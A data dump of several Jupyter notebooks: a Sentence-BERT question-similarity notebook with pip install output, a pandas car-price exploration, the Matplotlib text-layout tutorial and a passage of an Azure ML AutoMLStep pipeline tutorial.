tokenizers==0.0.11\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/5e/36/7af38d572c935f8e0462ec7b4f7a46d73a2b3b1a938f50a5e8132d5b2dc5/tokenizers-0.0.11-cp36-cp36m-manylinux1_x86_64.whl (3.1MB)\n\u001b[K |████████████████████████████████| 3.1MB 30.7MB/s \n\u001b[?25hRequirement already satisfied: tqdm>=4.27 in /usr/local/lib/python3.6/dist-packages (from transformers) (4.28.1)\nCollecting sentencepiece\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/74/f4/2d5214cbf13d06e7cb2c20d84115ca25b53ea76fa1f0ade0e3c9749de214/sentencepiece-0.1.85-cp36-cp36m-manylinux1_x86_64.whl (1.0MB)\n\u001b[K |████████████████████████████████| 1.0MB 43.2MB/s \n\u001b[?25hRequirement already satisfied: boto3 in /usr/local/lib/python3.6/dist-packages (from transformers) (1.11.10)\nRequirement already satisfied: regex!=2019.12.17 in /usr/local/lib/python3.6/dist-packages (from transformers) (2019.12.20)\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from transformers) (1.17.5)\nRequirement already satisfied: filelock in /usr/local/lib/python3.6/dist-packages (from transformers) (3.0.12)\nRequirement already satisfied: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests->transformers) (2.8)\nRequirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests->transformers) (3.0.4)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests->transformers) (2019.11.28)\nRequirement already satisfied: urllib3<1.25,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests->transformers) (1.24.3)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from sacremoses->transformers) (1.12.0)\nRequirement already satisfied: click in /usr/local/lib/python3.6/dist-packages (from sacremoses->transformers) (7.0)\nRequirement already satisfied: joblib in /usr/local/lib/python3.6/dist-packages (from sacremoses->transformers) (0.14.1)\nRequirement already satisfied: s3transfer<0.4.0,>=0.3.0 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers) (0.3.2)\nRequirement already satisfied: botocore<1.15.0,>=1.14.10 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers) (1.14.10)\nRequirement already satisfied: jmespath<1.0.0,>=0.7.1 in /usr/local/lib/python3.6/dist-packages (from boto3->transformers) (0.9.4)\nRequirement already satisfied: python-dateutil<3.0.0,>=2.1 in /usr/local/lib/python3.6/dist-packages (from botocore<1.15.0,>=1.14.10->boto3->transformers) (2.6.1)\nRequirement already satisfied: docutils<0.16,>=0.10 in /usr/local/lib/python3.6/dist-packages (from botocore<1.15.0,>=1.14.10->boto3->transformers) (0.15.2)\nBuilding wheels for collected packages: sacremoses\n Building wheel for sacremoses (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for sacremoses: filename=sacremoses-0.0.38-cp36-none-any.whl size=884628 sha256=30e961a6728c28c1bda9252a9bff9ca06b5a15bf01c7c8ed139a13bfbb6bd563\n Stored in directory: /root/.cache/pip/wheels/6d/ec/1a/21b8912e35e02741306f35f66c785f3afe94de754a0eaf1422\nSuccessfully built sacremoses\nInstalling collected packages: sacremoses, tokenizers, sentencepiece, transformers\nSuccessfully installed sacremoses-0.0.38 sentencepiece-0.1.85 tokenizers-0.0.11 transformers-2.4.1\n"
],
[
"import torch\nimport numpy as np\nimport pandas as pd\nfrom sentence_transformers import SentenceTransformer\nimport scipy.spatial\nfrom torch.utils.data import DataLoader\nimport time",
"_____no_output_____"
],
[
"pwd",
"_____no_output_____"
],
[
"df =pd.read_csv('/content/drive/My Drive/sbert/train.csv', header=None)",
"_____no_output_____"
],
[
"df[3] = df[3].astype(str)\ndf[4] = df[4].astype(str)",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"from torch.utils.data import DataLoader\nimport math\nfrom sentence_transformers import models, losses\nfrom sentence_transformers import SentencesDataset, LoggingHandler, SentenceTransformer\nfrom sentence_transformers.evaluation import EmbeddingSimilarityEvaluator\nfrom sentence_transformers.readers import *\nfrom sentence_transformers.readers.QuoraDataReader import QuoraDataReader\nimport logging\nfrom datetime import datetime",
"_____no_output_____"
],
[
"pwd",
"_____no_output_____"
],
[
"from sentence_transformers.readers import InputExample\nimport csv\nimport gzip\nimport os\nimport pandas as pd\nclass QuoraDataReader:\n \"\"\"\n Reads in the STS dataset. Each line contains two sentences (s1_col_idx, s2_col_idx) and one label (score_col_idx)\n \"\"\"\n def __init__(self, dataset_folder, s1_col_idx=3, s2_col_idx=4, score_col_idx=5, delimiter=\"\\t\",\n quoting=csv.QUOTE_NONE, normalize_scores=True, min_score=0, max_score=1):\n self.dataset_folder = dataset_folder\n self.score_col_idx = score_col_idx\n self.s1_col_idx = s1_col_idx\n self.s2_col_idx = s2_col_idx\n self.delimiter = delimiter\n self.quoting = quoting\n self.normalize_scores = normalize_scores\n self.min_score = min_score\n self.max_score = max_score\n\n def get_examples(self, filename, max_examples=0):\n \"\"\"\n filename specified which data split to use (train.csv, dev.csv, test.csv).\n \"\"\"\n data = csv.reader(open(os.path.join(self.dataset_folder, filename), encoding=\"utf-8\"),\n delimiter=self.delimiter, quoting=self.quoting)\n df =pd.read_csv(os.path.join(self.dataset_folder, filename), header =None)\n df[self.s1_col_idx] = df[self.s1_col_idx].astype(str)\n df[self.s2_col_idx] = df[self.s2_col_idx].astype(str)\n examples = []\n \n for id,row in df.iterrows():\n score =int(row[self.score_col_idx])\n if self.normalize_scores: # Normalize to a 0...1 value\n score = (score - self.min_score) / (self.max_score - self.min_score)\n\n s1 = row[self.s1_col_idx]\n s2 = row[self.s2_col_idx]\n examples.append(InputExample(guid=filename+str(id), texts=[s1, s2], label=score))\n\n if max_examples > 0 and len(examples) >= max_examples:\n break\n\n return examples",
"_____no_output_____"
],
[
"ls '/content'",
"_____no_output_____"
],
[
"quora_reader = QuoraDataReader('/') ",
"_____no_output_____"
],
[
"model_name = 'bert-base-nli-mean-tokens'\ntrain_batch_size = 16\nnum_epochs = 4\nmodel_save_path = 'sentence-transformers-master/training_stsbenchmark_continue_training-'+model_name+'-'+datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")",
"_____no_output_____"
],
[
"\nmodel = SentenceTransformer(model_name)",
"100%|██████████| 405M/405M [00:10<00:00, 39.6MB/s]\n"
],
[
"pwd",
"_____no_output_____"
],
[
"tmp1 =df[1].tolist()\ntmp2 =df[2].tolist()\nk =tmp1 + tmp2",
"_____no_output_____"
],
[
"tmp1 =df[3].tolist()\ntmp2 =df[4].tolist()\nv =tmp1 + tmp2",
"_____no_output_____"
],
[
"train_data = SentencesDataset(quora_reader.get_examples('/content/drive/My Drive/sbert/train.csv'), model)\n",
"_____no_output_____"
],
[
"from collections import OrderedDict \nres = OrderedDict(zip(k, v)) ",
"_____no_output_____"
],
[
"res = OrderedDict(sorted(res.items(), key=lambda x: int(x[0])))\n",
"_____no_output_____"
],
[
"corpus =list(res.values())\nlen(corpus)",
"_____no_output_____"
],
[
"tic=time.time()\nembeddings =model.encode(corpus)\ntoc=time.time()\nprint(toc- tic)\nvar =toc -tic",
"1260.0355427265167\n"
],
[
"embeddings",
"_____no_output_____"
],
[
"import pickle\n\nwith open('embeddings.pk', 'wb') as f:\n pickle.dump(mylist, f)",
"ERROR:root:Internal Python error in the inspect module.\nBelow is the traceback from this internal error.\n\n"
],
[
"pwd",
"_____no_output_____"
],
[
"train_batch_size = 16\ntest_data = SentencesDataset(examples=sts_reader.get_examples('/content/drive/My Drive/sbert/train.csv'), model=model)\ntest_dataloader = DataLoader(test_data, shuffle=False, batch_size=train_batch_size)\nevaluator = EmbeddingSimilarityEvaluator(test_dataloader)\nmodel.evaluate(evaluator)",
"ERROR:root:Internal Python error in the inspect module.\nBelow is the traceback from this internal error.\n\n"
],
[
"corpus = list(res.values())\nimport time",
"_____no_output_____"
],
[
"res.items()",
"_____no_output_____"
],
[
"\nlen(corpus)",
"_____no_output_____"
],
[
"\n# tic=time.time()\n",
"_____no_output_____"
],
[
"emembeddings",
"_____no_output_____"
],
[
"embeddings[0].shape",
"_____no_output_____"
],
[
" corpus_embeddings= embeddings",
"_____no_output_____"
],
[
"queries = ['How to order ']\nquery_embeddings = model.encode(queries)",
"_____no_output_____"
],
[
"closest_n = 10\nfor query, query_embedding in zip(queries, query_embeddings):\n distances = scipy.spatial.distance.cdist([query_embedding], corpus_embeddings, \"cosine\")[0]\n\n results = zip(range(len(distances)), distances)\n results = sorted(results, key=lambda x: x[1])\n\n print(\"\\n\\n======================\\n\\n\")\n print(\"Query:\", query)\n print(\"\\nTop 10 most similar sentences in corpus:\")\n\n for idx, distance in results[0:closest_n]:\n print(corpus[idx].strip(), \"(Score: %.4f)\" % (1-distance))",
"_____no_output_____"
],
[
"a = df[3].tolist()\na = [model.encode(i) for i in a]\nb=df[4].tolist()\na = [model.encode(i) for i in b]",
"_____no_output_____"
],
[
"a[:5]",
"_____no_output_____"
],
[
"b[:5]",
"_____no_output_____"
],
[
"!pip install sklearn",
"_____no_output_____"
],
[
"import sklearn\nfrom sklearn.metrics.pairwise import cosine_similarity",
"_____no_output_____"
],
[
"sklearn.metrics.pairwise.cosine_similarity(a, b, dense_output=True)",
"_____no_output_____"
],
[
"x = corpus_embeddings[0].reshape(-1,1)",
"_____no_output_____"
],
[
"x.shape",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb047e8fdd7ee10b90516da11d3f995f3a827c8b | 11,956 | ipynb | Jupyter Notebook | python/learn/matplotlib/tutorials_jupyter/text/text_props.ipynb | flyingwjw/Documentation | 567608f388ca369b864c2d75a94647801b5dfa1e | [
"Unlicense"
] | null | null | null | python/learn/matplotlib/tutorials_jupyter/text/text_props.ipynb | flyingwjw/Documentation | 567608f388ca369b864c2d75a94647801b5dfa1e | [
"Unlicense"
] | null | null | null | python/learn/matplotlib/tutorials_jupyter/text/text_props.ipynb | flyingwjw/Documentation | 567608f388ca369b864c2d75a94647801b5dfa1e | [
"Unlicense"
] | null | null | null | 196 | 4,965 | 0.483105 | [
[
[
"%matplotlib inline",
"_____no_output_____"
]
],
[
[
"\n# Text properties and layout\n\n\nControlling properties of text and its layout with Matplotlib.\n\nThe :class:`matplotlib.text.Text` instances have a variety of\nproperties which can be configured via keyword arguments to the text\ncommands (e.g., :func:`~matplotlib.pyplot.title`,\n:func:`~matplotlib.pyplot.xlabel` and :func:`~matplotlib.pyplot.text`).\n\n========================== ======================================================================================================================\nProperty Value Type\n========================== ======================================================================================================================\nalpha `float`\nbackgroundcolor any matplotlib :doc:`color </tutorials/colors/colors>`\nbbox `~matplotlib.patches.Rectangle` prop dict plus key ``'pad'`` which is a pad in points\nclip_box a matplotlib.transform.Bbox instance\nclip_on bool\nclip_path a `~matplotlib.path.Path` instance and a `~matplotlib.transforms.Transform` instance, a `~matplotlib.patches.Patch`\ncolor any matplotlib :doc:`color </tutorials/colors/colors>`\nfamily [ ``'serif'`` | ``'sans-serif'`` | ``'cursive'`` | ``'fantasy'`` | ``'monospace'`` ]\nfontproperties a `~matplotlib.font_manager.FontProperties` instance\nhorizontalalignment or ha [ ``'center'`` | ``'right'`` | ``'left'`` ]\nlabel any string\nlinespacing `float`\nmultialignment [``'left'`` | ``'right'`` | ``'center'`` ]\nname or fontname string e.g., [``'Sans'`` | ``'Courier'`` | ``'Helvetica'`` ...]\npicker [None|float|boolean|callable]\nposition (x, y)\nrotation [ angle in degrees | ``'vertical'`` | ``'horizontal'`` ]\nsize or fontsize [ size in points | relative size, e.g., ``'smaller'``, ``'x-large'`` ]\nstyle or fontstyle [ ``'normal'`` | ``'italic'`` | ``'oblique'`` ]\ntext string or anything printable with '%s' conversion\ntransform a `~matplotlib.transforms.Transform` instance\nvariant [ ``'normal'`` | ``'small-caps'`` ]\nverticalalignment or va [ ``'center'`` | ``'top'`` | ``'bottom'`` | ``'baseline'`` ]\nvisible bool\nweight or fontweight [ ``'normal'`` | ``'bold'`` | ``'heavy'`` | ``'light'`` | ``'ultrabold'`` | ``'ultralight'``]\nx `float`\ny `float`\nzorder any number\n========================== ======================================================================================================================\n\n\nYou can lay out text with the alignment arguments\n``horizontalalignment``, ``verticalalignment``, and\n``multialignment``. ``horizontalalignment`` controls whether the x\npositional argument for the text indicates the left, center or right\nside of the text bounding box. ``verticalalignment`` controls whether\nthe y positional argument for the text indicates the bottom, center or\ntop side of the text bounding box. ``multialignment``, for newline\nseparated strings only, controls whether the different lines are left,\ncenter or right justified. Here is an example which uses the\n:func:`~matplotlib.pyplot.text` command to show the various alignment\npossibilities. The use of ``transform=ax.transAxes`` throughout the\ncode indicates that the coordinates are given relative to the axes\nbounding box, with 0,0 being the lower left of the axes and 1,1 the\nupper right.\n\n",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n# build a rectangle in axes coords\nleft, width = .25, .5\nbottom, height = .25, .5\nright = left + width\ntop = bottom + height\n\nfig = plt.figure()\nax = fig.add_axes([0, 0, 1, 1])\n\n# axes coordinates are 0,0 is bottom left and 1,1 is upper right\np = patches.Rectangle(\n (left, bottom), width, height,\n fill=False, transform=ax.transAxes, clip_on=False\n )\n\nax.add_patch(p)\n\nax.text(left, bottom, 'left top',\n horizontalalignment='left',\n verticalalignment='top',\n transform=ax.transAxes)\n\nax.text(left, bottom, 'left bottom',\n horizontalalignment='left',\n verticalalignment='bottom',\n transform=ax.transAxes)\n\nax.text(right, top, 'right bottom',\n horizontalalignment='right',\n verticalalignment='bottom',\n transform=ax.transAxes)\n\nax.text(right, top, 'right top',\n horizontalalignment='right',\n verticalalignment='top',\n transform=ax.transAxes)\n\nax.text(right, bottom, 'center top',\n horizontalalignment='center',\n verticalalignment='top',\n transform=ax.transAxes)\n\nax.text(left, 0.5*(bottom+top), 'right center',\n horizontalalignment='right',\n verticalalignment='center',\n rotation='vertical',\n transform=ax.transAxes)\n\nax.text(left, 0.5*(bottom+top), 'left center',\n horizontalalignment='left',\n verticalalignment='center',\n rotation='vertical',\n transform=ax.transAxes)\n\nax.text(0.5*(left+right), 0.5*(bottom+top), 'middle',\n horizontalalignment='center',\n verticalalignment='center',\n fontsize=20, color='red',\n transform=ax.transAxes)\n\nax.text(right, 0.5*(bottom+top), 'centered',\n horizontalalignment='center',\n verticalalignment='center',\n rotation='vertical',\n transform=ax.transAxes)\n\nax.text(left, top, 'rotated\\nwith newlines',\n horizontalalignment='center',\n verticalalignment='center',\n rotation=45,\n transform=ax.transAxes)\n\nax.set_axis_off()\nplt.show()",
"_____no_output_____"
]
],
[
[
"# Default Font\n\n\nThe base default font is controlled by a set of rcParams. To set the font\nfor mathematical expressions, use the rcParams beginning with ``mathtext``\n(see `mathtext <mathtext-fonts>`).\n\n+---------------------+----------------------------------------------------+\n| rcParam | usage |\n+=====================+====================================================+\n| ``'font.family'`` | List of either names of font or ``{'cursive', |\n| | 'fantasy', 'monospace', 'sans', 'sans serif', |\n| | 'sans-serif', 'serif'}``. |\n| | |\n+---------------------+----------------------------------------------------+\n| ``'font.style'`` | The default style, ex ``'normal'``, |\n| | ``'italic'``. |\n| | |\n+---------------------+----------------------------------------------------+\n| ``'font.variant'`` | Default variant, ex ``'normal'``, ``'small-caps'`` |\n| | (untested) |\n+---------------------+----------------------------------------------------+\n| ``'font.stretch'`` | Default stretch, ex ``'normal'``, ``'condensed'`` |\n| | (incomplete) |\n| | |\n+---------------------+----------------------------------------------------+\n| ``'font.weight'`` | Default weight. Either string or integer |\n| | |\n| | |\n+---------------------+----------------------------------------------------+\n| ``'font.size'`` | Default font size in points. Relative font sizes |\n| | (``'large'``, ``'x-small'``) are computed against |\n| | this size. |\n+---------------------+----------------------------------------------------+\n\nThe mapping between the family aliases (``{'cursive', 'fantasy',\n'monospace', 'sans', 'sans serif', 'sans-serif', 'serif'}``) and actual font names\nis controlled by the following rcParams:\n\n\n+------------------------------------------+--------------------------------+\n| family alias | rcParam with mappings |\n+==========================================+================================+\n| ``'serif'`` | ``'font.serif'`` |\n+------------------------------------------+--------------------------------+\n| ``'monospace'`` | ``'font.monospace'`` |\n+------------------------------------------+--------------------------------+\n| ``'fantasy'`` | ``'font.fantasy'`` |\n+------------------------------------------+--------------------------------+\n| ``'cursive'`` | ``'font.cursive'`` |\n+------------------------------------------+--------------------------------+\n| ``{'sans', 'sans serif', 'sans-serif'}`` | ``'font.sans-serif'`` |\n+------------------------------------------+--------------------------------+\n\n\nwhich are lists of font names.\n\nText with non-latin glyphs\n==========================\n\nAs of v2.0 the `default font <default_changes_font>` contains\nglyphs for many western alphabets, but still does not cover all of the\nglyphs that may be required by mpl users. For example, DejaVu has no\ncoverage of Chinese, Korean, or Japanese.\n\n\nTo set the default font to be one that supports the code points you\nneed, prepend the font name to ``'font.family'`` or the desired alias\nlists ::\n\n matplotlib.rcParams['font.sans-serif'] = ['Source Han Sans TW', 'sans-serif']\n\nor set it in your :file:`.matplotlibrc` file::\n\n font.sans-serif: Source Han Sans TW, Arial, sans-serif\n\nTo control the font used on per-artist basis use the ``'name'``,\n``'fontname'`` or ``'fontproperties'`` kwargs documented :doc:`above\n</tutorials/text/text_props>`.\n\n\nOn linux, `fc-list <https://linux.die.net/man/1/fc-list>`__ can be a\nuseful tool to discover the font name; for example ::\n\n $ fc-list :lang=zh family\n Noto to Sans Mono CJK TC,Noto Sans Mono CJK TC Bold\n Noto Sans CJK TC,Noto Sans CJK TC Medium\n Noto Sans CJK TC,Noto Sans CJK TC DemiLight\n Noto Sans CJK KR,Noto Sans CJK KR Black\n Noto Sans CJK TC,Noto Sans CJK TC Black\n Noto Sans Mono CJK TC,Noto Sans Mono CJK TC Regular\n Noto Sans CJK SC,Noto Sans CJK SC Light\n\nlists all of the fonts that support Chinese.\n\n\n",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb0495efd136d72c94c3ebe8f134f76c60182c91 | 158,967 | ipynb | Jupyter Notebook | day2_visualisation.ipynb | lejekjr/dw_matric_car | 81824b7b02912b5a614663054b8216d9025d6dc4 | [
"MIT"
] | null | null | null | day2_visualisation.ipynb | lejekjr/dw_matric_car | 81824b7b02912b5a614663054b8216d9025d6dc4 | [
"MIT"
] | null | null | null | day2_visualisation.ipynb | lejekjr/dw_matric_car | 81824b7b02912b5a614663054b8216d9025d6dc4 | [
"MIT"
] | null | null | null | 158,967 | 158,967 | 0.931168 | [
[
[
"!pip install --upgrade tables",
"Collecting tables\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/ed/c3/8fd9e3bb21872f9d69eb93b3014c86479864cca94e625fd03713ccacec80/tables-3.6.1-cp36-cp36m-manylinux1_x86_64.whl (4.3MB)\n\u001b[K |████████████████████████████████| 4.3MB 4.9MB/s \n\u001b[?25hRequirement already satisfied, skipping upgrade: numpy>=1.9.3 in /usr/local/lib/python3.6/dist-packages (from tables) (1.17.5)\nRequirement already satisfied, skipping upgrade: numexpr>=2.6.2 in /usr/local/lib/python3.6/dist-packages (from tables) (2.7.1)\nInstalling collected packages: tables\n Found existing installation: tables 3.4.4\n Uninstalling tables-3.4.4:\n Successfully uninstalled tables-3.4.4\nSuccessfully installed tables-3.6.1\n"
],
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns",
"_____no_output_____"
],
[
"cd \"/content/drive/My Drive/Colab Notebooks/dw_matrix/matrix_two/dw_matric_car\"",
"/content/drive/My Drive/Colab Notebooks/dw_matrix/matrix_two/dw_matric_car\n"
],
[
"ls",
"\u001b[0m\u001b[01;34mdata\u001b[0m/ LICENSE README.md\n"
],
[
"df = pd.read_hdf('data/car.h5')\ndf.shape",
"_____no_output_____"
],
[
"df.columns.values",
"_____no_output_____"
],
[
"df['price_value'].hist(bins=100);",
"_____no_output_____"
],
[
"df['price_value'].describe()",
"_____no_output_____"
],
[
"df['param_marka-pojazdu'].unique()",
"_____no_output_____"
],
[
"def group_and_barplot(feat_groupby, feat_agg='price_value', agg_funcs=[np.mean, np.median, np.size], feat_sort='mean', top=50, subplots=True):\n return (\n df\n .groupby(feat_groupby)[feat_agg]\n .agg(agg_funcs)\n .sort_values(by=feat_sort, ascending=False)\n .head(top)\n \n ).plot(kind='bar', figsize=(15,5), subplots=subplots)\n\n\n",
"_____no_output_____"
],
[
"group_and_barplot('param_marka-pojazdu');\n",
"_____no_output_____"
],
[
"group_and_barplot('param_kraj-pochodzenia');",
"_____no_output_____"
],
[
"group_and_barplot('param_kraj-pochodzenia', feat_sort='size');",
"_____no_output_____"
],
[
"group_and_barplot('param_kolor', feat_sort='mean'); ",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb049d7babdd112ddb939008ff35788eba63f90c | 17,340 | ipynb | Jupyter Notebook | how-to-use-azureml/machine-learning-pipelines/intro-to-pipelines/aml-pipelines-with-automated-machine-learning-step.ipynb | tmccrmck/MachineLearningNotebooks | 512630472b1c6f640e164d5889b30f2fed74d04a | [
"MIT"
] | 1 | 2020-03-02T12:40:42.000Z | 2020-03-02T12:40:42.000Z | how-to-use-azureml/machine-learning-pipelines/intro-to-pipelines/aml-pipelines-with-automated-machine-learning-step.ipynb | tmccrmck/MachineLearningNotebooks | 512630472b1c6f640e164d5889b30f2fed74d04a | [
"MIT"
] | null | null | null | how-to-use-azureml/machine-learning-pipelines/intro-to-pipelines/aml-pipelines-with-automated-machine-learning-step.ipynb | tmccrmck/MachineLearningNotebooks | 512630472b1c6f640e164d5889b30f2fed74d04a | [
"MIT"
] | 1 | 2021-06-10T15:57:01.000Z | 2021-06-10T15:57:01.000Z | 33.154876 | 474 | 0.532122 | [
[
[
"Copyright (c) Microsoft Corporation. All rights reserved. \nLicensed under the MIT License.",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"# Azure Machine Learning Pipeline with AutoMLStep\nThis notebook demonstrates the use of AutoMLStep in Azure Machine Learning Pipeline.",
"_____no_output_____"
],
[
"## Introduction\nIn this example we showcase how you can use AzureML Dataset to load data for AutoML via AML Pipeline. \n\nIf you are using an Azure Machine Learning Notebook VM, you are all set. Otherwise, make sure you have executed the [configuration](https://aka.ms/pl-config) before running this notebook.\n\nIn this notebook you will learn how to:\n1. Create an `Experiment` in an existing `Workspace`.\n2. Create or Attach existing AmlCompute to a workspace.\n3. Define data loading in a `TabularDataset`.\n4. Configure AutoML using `AutoMLConfig`.\n5. Use AutoMLStep\n6. Train the model using AmlCompute\n7. Explore the results.\n8. Test the best fitted model.",
"_____no_output_____"
],
[
"## Azure Machine Learning and Pipeline SDK-specific imports",
"_____no_output_____"
]
],
[
[
"import logging\nimport os\nimport csv\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn import datasets\nimport pkg_resources\n\nimport azureml.core\nfrom azureml.core.experiment import Experiment\nfrom azureml.core.workspace import Workspace\nfrom azureml.train.automl import AutoMLConfig\nfrom azureml.core.compute import AmlCompute\nfrom azureml.core.compute import ComputeTarget\nfrom azureml.core.dataset import Dataset\nfrom azureml.core.runconfig import RunConfiguration\nfrom azureml.core.conda_dependencies import CondaDependencies\n\nfrom azureml.train.automl.runtime import AutoMLStep\n\n# Check core SDK version number\nprint(\"SDK version:\", azureml.core.VERSION)",
"_____no_output_____"
]
],
[
[
"## Initialize Workspace\nInitialize a workspace object from persisted configuration. Make sure the config file is present at .\\config.json",
"_____no_output_____"
]
],
[
[
"ws = Workspace.from_config()\nprint(ws.name, ws.resource_group, ws.location, ws.subscription_id, sep = '\\n')",
"_____no_output_____"
]
],
[
[
"## Create an Azure ML experiment\nLet's create an experiment named \"automl-classification\" and a folder to hold the training scripts. The script runs will be recorded under the experiment in Azure.\n\nThe best practice is to use separate folders for scripts and its dependent files for each step and specify that folder as the `source_directory` for the step. This helps reduce the size of the snapshot created for the step (only the specific folder is snapshotted). Since changes in any files in the `source_directory` would trigger a re-upload of the snapshot, this helps keep the reuse of the step when there are no changes in the `source_directory` of the step.",
"_____no_output_____"
]
],
[
[
"# Choose a name for the run history container in the workspace.\nexperiment_name = 'automlstep-classification'\nproject_folder = './project'\n\nexperiment = Experiment(ws, experiment_name)\nexperiment",
"_____no_output_____"
]
],
[
[
"### Create or Attach an AmlCompute cluster\nYou will need to create a [compute target](https://docs.microsoft.com/azure/machine-learning/service/concept-azure-machine-learning-architecture#compute-target) for your AutoML run. In this tutorial, you get the default `AmlCompute` as your training compute resource.",
"_____no_output_____"
]
],
[
[
"# Choose a name for your cluster.\namlcompute_cluster_name = \"cpu-cluster\"\n\nfound = False\n# Check if this compute target already exists in the workspace.\ncts = ws.compute_targets\nif amlcompute_cluster_name in cts and cts[amlcompute_cluster_name].type == 'AmlCompute':\n found = True\n print('Found existing compute target.')\n compute_target = cts[amlcompute_cluster_name]\n \nif not found:\n print('Creating a new compute target...')\n provisioning_config = AmlCompute.provisioning_configuration(vm_size = \"STANDARD_D2_V2\", # for GPU, use \"STANDARD_NC6\"\n #vm_priority = 'lowpriority', # optional\n max_nodes = 4)\n\n # Create the cluster.\n compute_target = ComputeTarget.create(ws, amlcompute_cluster_name, provisioning_config)\n \n # Can poll for a minimum number of nodes and for a specific timeout.\n # If no min_node_count is provided, it will use the scale settings for the cluster.\n compute_target.wait_for_completion(show_output = True, min_node_count = 1, timeout_in_minutes = 10)\n \n # For a more detailed view of current AmlCompute status, use get_status().",
"_____no_output_____"
],
[
"# create a new RunConfig object\nconda_run_config = RunConfiguration(framework=\"python\")\n\nconda_run_config.environment.docker.enabled = True\nconda_run_config.environment.docker.base_image = azureml.core.runconfig.DEFAULT_CPU_IMAGE\n\ncd = CondaDependencies.create(pip_packages=['azureml-sdk[automl]'], \n conda_packages=['numpy', 'py-xgboost<=0.80'])\nconda_run_config.environment.python.conda_dependencies = cd\n\nprint('run config is ready')",
"_____no_output_____"
]
],
[
[
"## Data",
"_____no_output_____"
]
],
[
[
"# The data referenced here was a 1MB simple random sample of the Chicago Crime data into a local temporary directory.\nexample_data = 'https://dprepdata.blob.core.windows.net/demo/crime0-random.csv'\ndataset = Dataset.Tabular.from_delimited_files(example_data)\ndataset.to_pandas_dataframe().describe()",
"_____no_output_____"
],
[
"dataset.take(5).to_pandas_dataframe()",
"_____no_output_____"
]
],
[
[
"### Review the Dataset Result\n\nYou can peek the result of a TabularDataset at any range using `skip(i)` and `take(j).to_pandas_dataframe()`. Doing so evaluates only `j` records for all the steps in the TabularDataset, which makes it fast even against large datasets.\n\n`TabularDataset` objects are composed of a list of transformation steps (optional).",
"_____no_output_____"
]
],
[
[
"X = dataset.drop_columns(columns=['Primary Type', 'FBI Code'])\ny = dataset.keep_columns(columns=['Primary Type'], validate=True)\nprint('X and y are ready!')",
"_____no_output_____"
]
],
[
[
"## Train\nThis creates a general AutoML settings object.",
"_____no_output_____"
]
],
[
[
"automl_settings = {\n \"iteration_timeout_minutes\" : 5,\n \"iterations\" : 2,\n \"primary_metric\" : 'AUC_weighted',\n \"preprocess\" : True,\n \"verbosity\" : logging.INFO\n}\nautoml_config = AutoMLConfig(task = 'classification',\n debug_log = 'automl_errors.log',\n path = project_folder,\n compute_target=compute_target,\n run_configuration=conda_run_config,\n X = X,\n y = y,\n **automl_settings\n )",
"_____no_output_____"
]
],
[
[
"You can define outputs for the AutoMLStep using TrainingOutput.",
"_____no_output_____"
]
],
[
[
"from azureml.pipeline.core import PipelineData, TrainingOutput\n\nds = ws.get_default_datastore()\nmetrics_output_name = 'metrics_output'\nbest_model_output_name = 'best_model_output'\n\nmetrics_data = PipelineData(name='metrics_data',\n datastore=ds,\n pipeline_output_name=metrics_output_name,\n training_output=TrainingOutput(type='Metrics'))\nmodel_data = PipelineData(name='model_data',\n datastore=ds,\n pipeline_output_name=best_model_output_name,\n training_output=TrainingOutput(type='Model'))",
"_____no_output_____"
]
],
[
[
"Create an AutoMLStep.",
"_____no_output_____"
]
],
[
[
"automl_step = AutoMLStep(\n name='automl_module',\n automl_config=automl_config,\n outputs=[metrics_data, model_data],\n allow_reuse=True)",
"_____no_output_____"
],
[
"from azureml.pipeline.core import Pipeline\npipeline = Pipeline(\n description=\"pipeline_with_automlstep\",\n workspace=ws, \n steps=[automl_step])",
"_____no_output_____"
],
[
"pipeline_run = experiment.submit(pipeline)",
"_____no_output_____"
],
[
"from azureml.widgets import RunDetails\nRunDetails(pipeline_run).show()",
"_____no_output_____"
],
[
"pipeline_run.wait_for_completion()",
"_____no_output_____"
]
],
[
[
"## Examine Results\n\n### Retrieve the metrics of all child runs\nOutputs of above run can be used as inputs of other steps in pipeline. In this tutorial, we will examine the outputs by retrieve output data and running some tests.",
"_____no_output_____"
]
],
[
[
"metrics_output = pipeline_run.get_pipeline_output(metrics_output_name)\nnum_file_downloaded = metrics_output.download('.', show_progress=True)",
"_____no_output_____"
],
[
"import json\nwith open(metrics_output._path_on_datastore) as f: \n metrics_output_result = f.read()\n \ndeserialized_metrics_output = json.loads(metrics_output_result)\ndf = pd.DataFrame(deserialized_metrics_output)\ndf",
"_____no_output_____"
]
],
[
[
